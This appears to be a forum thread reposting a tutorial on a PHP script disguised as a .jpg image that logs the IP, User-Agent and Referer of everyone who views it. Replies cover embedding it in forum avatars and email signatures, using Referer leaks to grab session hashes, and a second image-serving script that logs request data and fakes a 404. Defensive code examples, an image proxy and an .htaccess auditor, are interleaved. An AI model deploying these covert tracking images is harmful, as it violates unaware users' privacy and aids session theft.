EvilZone
Hacking and Security => Tutorials => : Kulverstukas April 10, 2015, 07:58:37 AM
-
This is an old tutorial I had saved from older boards. This member was pretty active and knowledgeable back then, but after the fall of 1nj3ct he went someplace and I haven't seen him since. I couldn't contact him either; it would be pretty nice if he could come back :)
Anyway, this is an old tutorial, so I'm sure he wouldn't mind me posting it.
.:Intro:.
Written by t3hmadhatt3r -- Contact me at t3hmadhatt3r@gmail.com.
Hello mates. I have been working on a method of getting IPs and other info using the GD library.
.:The Code:.
OK, first we will use the GD library in PHP to generate a valid image. Here's some code to do just that:
<?php
/*
.:Made by t3hmadhtt3r -- t3hmadhatt3r@gmail.com:.
.:Please don't share! Keep this quiet!:.
.:Please be safe:.
.:Enjoy!:.
*/
// Defining Variables
$IP = $_SERVER['REMOTE_ADDR']; // Saves the IP
$UA = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; // Saves the User Agent (not every client sends one)
$RE = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; // Saves the Referer (absent on direct hits; an undefined-index notice here would be output before header() and break the image)
$DATE = date('l jS \of F Y h:i:s A');
// htmlspecialchars() so a crafted User Agent or Referer cannot inject HTML into the log page
$DATA = '<p>IP: '.htmlspecialchars($IP).'<br/><p>User Agent: '.htmlspecialchars($UA).'<br/><p>Referer: '.htmlspecialchars($RE).'<br/><p>Date: '.$DATE.'<br/><br/><br/>';
/*PS: Try using the referer logging feature to exploit forums and sites that keep useful info in the URL. Example: HTTP://WWW.LAMESITE.COM/POST.PHP?ID=4&HASH=(THE VICTIMS MD5 HASH)&USER=t3hmadhatt3r*/
// Writing the logs
$fp = fopen('Cool_Huh?.html', 'a');
fwrite($fp, $DATA);
fclose($fp);
// Behold the mighty GD Library ^_^
header("Content-type: image/png");
$img = ImageCreate(1, 1); // 1x1 palette image
$bg = ImageColorAllocate($img, 0, 0, 0); // the first colour allocated becomes the background
ImagePng($img); // writes the PNG to the output
ImageDestroy($img); // free the image resource
// Later...
?>
More Info about that PHP GD library at http://us2.php.net/manual/en/book.image.php
.:Faking the Extension:.
Now we have a valid image, but how will we get it to work on forums that don't allow php as an image extension? Well, there are two ways, one of which is better than the other.
1. .htaccess (This is the best way)
If you are using a server that allows you to configure your own .htaccess file, then you can add the following line to execute all files with the .jpg extension as PHP files.
AddHandler application/x-httpd-php .jpg
Note: If you don't have a server that allows this, I recommend looking at http://www.free-webhosts.com/search-webhosts.php?SA=.htaccess.
Now you can rename the php file to jpg and it will still work! Tricky, aye?
2. Tricky Technique (This way works just the same but is suspicious)
This technique can be done on most servers (I tried it on t35 and got some permission errors... probably because of the jail shell), but it could get some attention from an admin pretty quickly. Just add /image.jpg to the end of the PHP file's URL.
Example:
http://subdomain.whatever.com/script.php/image.jpg
This will make it look like the extension is jpg, but PHP will ignore it and execute normally.
.:Ending:.
Now you can embed this image in forums just like any other image.
Enjoy the code!
-- t3hmadhatt3r;
-
Huh, I really don't follow. Why is this useful?
-
Huh, I really don't follow. Why is this useful?
You can use this as a fake image on a forum and harvest session-related data of users visiting a page embedding it.
For instance, I host that php script on some server and make my profile picture on some shtty forum link to it. Then I start posting around etc. As soon as someone reads one of my posts, the script gets executed, which means that I can do some fancy stuff to the visitors.
That's how I got it, I might be wrong.
-
You can use this as a fake image on a forum and harvest session-related data of users visiting a page embedding it.
For instance, I host that php script on some server and make my profile picture on some shtty forum link to it. Then I start posting around etc. As soon as someone reads one of my posts, the script gets executed, which means that I can do some fancy stuff to the visitors.
That's how I got it, I might be wrong.
Yes, pretty much this. It has been done a few times on this forum, but those users were warned and/or banned.
-
Yes, pretty much this. It has been done a few times on this forum, but those users were warned and/or banned.
Oops, shouldn't have said "shitty forum" then. ^^
-
IIRC we have safeguards in place so nignogs can't do that any more.
-
Then HF, here I come. I might create a productive botnet out of them HF ninjas.
-
This is called a tracking pixel.
http://stackoverflow.com/questions/13079666/developing-a-tracking-pixel
If you implement this in an e-mail, you get the time when the e-mail was read.
-
It's awesome :D
I have 2 questions:
Does it still work?
And how to protect ourselves, or suppose I own a forum, how to protect members from it?
-
Does it still work?
Yes and it will as long as PHP is around.
How to protect ourselves, or suppose I own a forum, how to protect members from it?
You can't. IMO the only thing you can do is surf the web through proxies if you're that paranoid...
For protecting people in a forum - well, disable avatars and signatures, and you can probably forbid images in posts too, but users might not like it.
-
Yes and it will as long as PHP is around.
You can't. IMO the only thing you can do is surf the web through proxies if you're that paranoid...
For protecting people in a forum - well, disable avatars and signatures, and you can probably forbid images in posts too, but users might not like it.
I second using a VPN all the time. It will encrypt your traffic out of your network in case something on your network has been pwned, and will stop these people from getting your IP. If you want to be anonymous, then change your IP when you switch between personas and use a very commonly used VPN.
-
Would it be possible to tweak this script into e.g. doing redirects? Like on sites that only allow image uploads, and when users then visit the image URL they get redirected?
-
I suppose, by using a header() function, or cURL.
-
I wonder if there is a method similar to this, that can be deployed and embedded in emails. You send an email to an individual or group of individuals, then magic happens the moment your email is opened by others?
-
Well since it is possible to send emails in HTML format, you can include JavaScript. But I guess it won't be very successful since some security measures should be in place to prevent this kind of threat. Is that what you meant? Can't think of something more sophisticated right now.
-
Well since it is possible to send emails in HTML format, you can include JavaScript. But I guess it won't be very successful since some security measures should be in place to prevent this kind of threat. Is that what you meant? Can't think of something more sophisticated right now.
Correct. Now hear my idea: you know that in emails you can always use a signature at the end of every email you send, for example:
Micheal J
General director
XY company
Address.....
Right. Now, in theory, you can replace this signature with an image: simply take any email with a signature, do a print screen, paste it in Paint, cut out the signature and upload it as a jpg using this PHP trick, then send another email to a certain individual with the signature being the PHP image.
I hope you get my idea.
-
Thunderbird blocks images in every email when viewing it, unless the user clicks a button to view the images. Just sayin'...
-
Same for Gmail etc.
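The protections mentioned in the last few replies (forums disabling remote avatars and signatures, Thunderbird and Gmail holding back remote images) all reduce to one design: the forum or mail client fetches the remote image itself, so the reader's IP, User-Agent and Referer never reach the host of the "image", and it forwards the bytes only after checking that they really are an image. The following is an added example in Python, not code from this thread or from any forum or mail software, of that camo-style image proxy: the embedding side rewrites every remote <img src> to an HMAC-signed proxy URL, and the proxy side verifies the signature (so it cannot be used as an open relay) and checks magic bytes instead of trusting the upstream Content-Type, which the scripts in this thread set to whatever they like. PROXY_SECRET, PROXY_BASE, the size cap and the sample fragment used in testing are constructed for the example.

```python
import hashlib
import hmac
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# Constructed values for the example; a real deployment loads the secret from config.
PROXY_SECRET = b"constructed-example-secret"
PROXY_BASE = "https://img-proxy.example.invalid/"  # hypothetical proxy host
MAX_IMAGE_BYTES = 2 * 1024 * 1024

# Magic bytes of the formats the proxy is willing to forward.
_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sign_image_url(url: str, secret: bytes = PROXY_SECRET) -> str:
    """Embedding side: turn a remote image URL into <proxy>/<hmac>/<encoded-url>.
    Only URLs the site itself rewrote carry a valid HMAC, so the proxy is not an open relay."""
    digest = hmac.new(secret, url.encode(), hashlib.sha256).hexdigest()
    return f"{PROXY_BASE}{digest}/{quote(url, safe='')}"


def verify_proxy_path(path: str, secret: bytes = PROXY_SECRET):
    """Proxy side: return the original URL if the signature is valid, else None."""
    parts = path.lstrip("/").split("/", 1)
    if len(parts) != 2:
        return None
    digest, encoded = parts
    url = unquote(encoded)
    expected = hmac.new(secret, url.encode(), hashlib.sha256).hexdigest()
    return url if hmac.compare_digest(digest, expected) else None


def sniff_image_type(data: bytes):
    """Identify PNG/JPEG/GIF from the leading bytes. The upstream Content-Type is
    not consulted: a script can send 'image/png' with any body it likes."""
    for magic, mime in _MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def accept_upstream_response(body: bytes):
    """Decide whether the proxy may forward an upstream body to the reader.
    Returns (ok, content_type); oversize and non-image bodies are refused."""
    if len(body) > MAX_IMAGE_BYTES:
        return (False, None)
    mime = sniff_image_type(body)
    return (mime is not None, mime)


class _ImgRewriter(HTMLParser):
    """Re-serialise an HTML fragment, routing every http(s) <img src> through the
    proxy and dropping src values with any other scheme (data:, javascript:, relative)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def _emit(self, tag, attrs, self_closing):
        if tag == "img":
            kept = []
            for name, value in attrs:
                if name == "src":
                    if not (value and re.match(r"^https?://", value, re.I)):
                        continue  # drop the attribute entirely
                    value = sign_image_url(value)
                kept.append((name, value))
            attrs = kept
        rendered = "".join(
            f' {n}="{html.escape(v, quote=True)}"' if v is not None else f" {n}"
            for n, v in attrs
        )
        self.out.append(f"<{tag}{rendered}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        self._emit(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._emit(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # convert_charrefs decoded entities, so re-escape text on the way out
        self.out.append(html.escape(data, quote=False))


def proxify_html(fragment: str) -> str:
    """Rewrite remote images in a post or mail body before it is shown to readers."""
    parser = _ImgRewriter()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

proxify_html only rewrites image references; it is not a full HTML sanitizer and assumes the forum already strips script and event handlers from user HTML. On the proxy side, the fetch itself (not shown) should follow the usual outbound rules: resolve the host and refuse private and loopback addresses, cap redirects, and apply the size limit while streaming rather than after reading the whole body.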
-
Here's an example that works with .htaccess to generate images a couple of different ways. (All of them are basically using the output of file_get_contents.) It's designed to be "index.php" in, say, your /images/ directory. URLs can be "site.com/images/whatever.jpg", and you can generate the image like the original, read it from disk, DB, etc.
Please don't use a database to store images in real life.
<?php
// Log the json-encoded SERVER array for later parsing. This can also be had from access.log
error_log(json_encode($_SERVER));
if (isset($_GET['f'])) {
/* prevent path traversal */
$f = basename($_GET['f']);
/**
* Determine the picture by UserAgent
*/
$image = '';
if ($f == 'useragent.png') {
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
// strpos() returns 0 for a match at offset 0, which is falsy, so compare against false explicitly
if (strpos($ua, 'linux') !== false) {
$image = 'linux.png';
} elseif (strpos($ua, 'windows') !== false) {
$image = 'windows.png';
} elseif (strpos($ua, 'mac os x') !== false) { // browser UAs say "Mac OS X", not "osx"
$image = 'osx.png';
}
/*
* You could then continue with the image manipulation functions
* to output text. e.g., timestamps, 'your IP is..' images, etc.
*/
/**
* Just read out the file
*/
if ($image && file_exists($image)) {
header('Content-Type: image/png');
die(file_get_contents($image));
}
}
/**
* An example of aliasing an image to another site.
* The IP of your server will be visible in evilzone's logs
* each time someone views this page.
*/
if ($f == 'hacking.jpg' || $f == 'hacking.foo') { // was "$f = 'hacking.foo'", an assignment that made this branch always true
header('Content-Type: image/png');
die(file_get_contents('https://evilzone.org/logo_02.png'));
}
/**
* You'll obviously need a database with info for this to work.
*/
if ($f == 'database.png') {
// $pdo is assumed to be a PDO connection opened earlier (not shown in this post)
$stmt = $pdo->prepare('SELECT image_data, content_type FROM images WHERE image_name = :name');
$stmt->execute(array('name' => $f));
$row = $stmt->fetch();
header('Content-Type: ' . $row['content_type']);
die($row['image_data']);
}
/**
* Get from local filesystem
* 1) Don't trust user's file extension for Content-Type and do some
* long switch/case. Just read it from the source file.
*/
if ($f && file_exists($f)) {
// exif_imagetype() returns an IMAGETYPE_* constant (or false), not a MIME string
$type = exif_imagetype($f);
if ($type !== false) { // only serve files that really are images; anything else falls through to the 404
header('Content-Type: ' . image_type_to_mime_type($type));
die(file_get_contents($f));
}
}
}
/**
* Make it look like native 404 page
*/
header('HTTP/1.0 404 Not Found'); // status line is "<code> <reason>", no dash in between
$url = htmlentities($_SERVER['REQUEST_URI']);
$html=<<<EOF
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL {$url} was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at {$_SERVER['SERVER_NAME']} Port {$_SERVER['SERVER_PORT']}</address>
</body></html>
EOF;
die($html);
And the .htaccess rewrite rule:
RewriteEngine On
# Rewrite /<file>.<ext> to index.php?f=<file>.<ext> [NoCase, Last]
RewriteRule ([^\.]+)\.(png|jpg|gif)$ index.php?f=$1.$2 [NC,L]
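Both hosting-side tricks in this thread leave a trace in configuration: the AddHandler line from the first post makes Apache run .jpg files as PHP, and the RewriteRule above routes every image URL into index.php. An admin reviewing customer webroots on a shared host, or a forum operator auditing an upload directory, can look for exactly those directives. The following is an added example in Python, not code from this thread, that audits .htaccess text for handler and rewrite directives mapping image extensions to PHP, and for AcceptPathInfo On, which re-enables the script.php/image.jpg path-info form from the second technique. SAMPLE_HTACCESS is constructed for the example and repeats the two directives quoted in the thread next to harmless lines.

```python
import re
from typing import List, Tuple

# Extensions a forum or mail client treats as "just an image".
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif", "bmp", "webp", "svg", "ico"}
# Handler and MIME names that hand a file to PHP (application/x-httpd-php, php-script, ...).
PHP_HANDLER_RE = re.compile(r"php", re.I)
# RewriteRule targets that end up in a PHP script: index.php, index.php?f=..., show.php/...
PHP_TARGET_RE = re.compile(r"\.php(\?|/|$)", re.I)


def _pattern_mentions_image(pattern: str) -> bool:
    """True if a RewriteRule pattern names an image extension anywhere in it."""
    words = {w.lower() for w in re.findall(r"[A-Za-z0-9]+", pattern)}
    return bool(words & IMAGE_EXTS)


def audit_htaccess(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for each directive that makes image URLs execute PHP.

    Checked: AddHandler/AddType mapping an image extension to a PHP handler,
    SetHandler forcing PHP for a whole scope, RewriteRule routing an image
    pattern into a .php target, and AcceptPathInfo On.
    """
    findings: List[Tuple[int, str]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments ('#' inside a rewrite regex is rare)
        if not line:
            continue
        tokens = line.split()
        directive = tokens[0].lower()
        if directive in ("addhandler", "addtype") and len(tokens) >= 3:
            if PHP_HANDLER_RE.search(tokens[1]):
                bad = [t for t in tokens[2:] if t.lstrip(".").lower() in IMAGE_EXTS]
                if bad:
                    findings.append((lineno, f"{tokens[0]} runs {' '.join(bad)} through {tokens[1]}"))
        elif directive == "sethandler" and len(tokens) >= 2:
            if PHP_HANDLER_RE.search(tokens[1]):
                findings.append((lineno, f"SetHandler {tokens[1]} forces PHP for every file in its scope"))
        elif directive == "rewriterule" and len(tokens) >= 3:
            pattern, target = tokens[1], tokens[2]
            if PHP_TARGET_RE.search(target) and _pattern_mentions_image(pattern):
                findings.append((lineno, f"RewriteRule routes image URLs matching {pattern} to {target}"))
        elif directive == "acceptpathinfo" and len(tokens) >= 2 and tokens[1].lower() == "on":
            findings.append((lineno, "AcceptPathInfo On lets /script.php/image.jpg reach script.php"))
    return findings


# Constructed sample: the two directives from this thread plus harmless lines.
SAMPLE_HTACCESS = r"""# constructed sample .htaccess
Options -Indexes
AddType image/png .png
AddHandler application/x-httpd-php .jpg
RewriteEngine On
RewriteRule ([^\.]+)\.(png|jpg|gif)$ index.php?f=$1.$2 [NC,L]
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
AcceptPathInfo On
"""

if __name__ == "__main__":
    for lineno, reason in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {lineno}: {reason}")
```

On Apache the scanner is a fallback; the root cause is an override setting. AddHandler, AddType, SetHandler, RewriteRule and AcceptPathInfo in .htaccess all require AllowOverride FileInfo, so a vhost configured with AllowOverride None (or an AllowOverride list without FileInfo) ignores them, and AcceptPathInfo Off in the server config makes a request for script.php/image.jpg return 404 instead of running script.php. The scanner is for shared hosts that cannot lock overrides down per customer and want to find these directives before a forum elsewhere does.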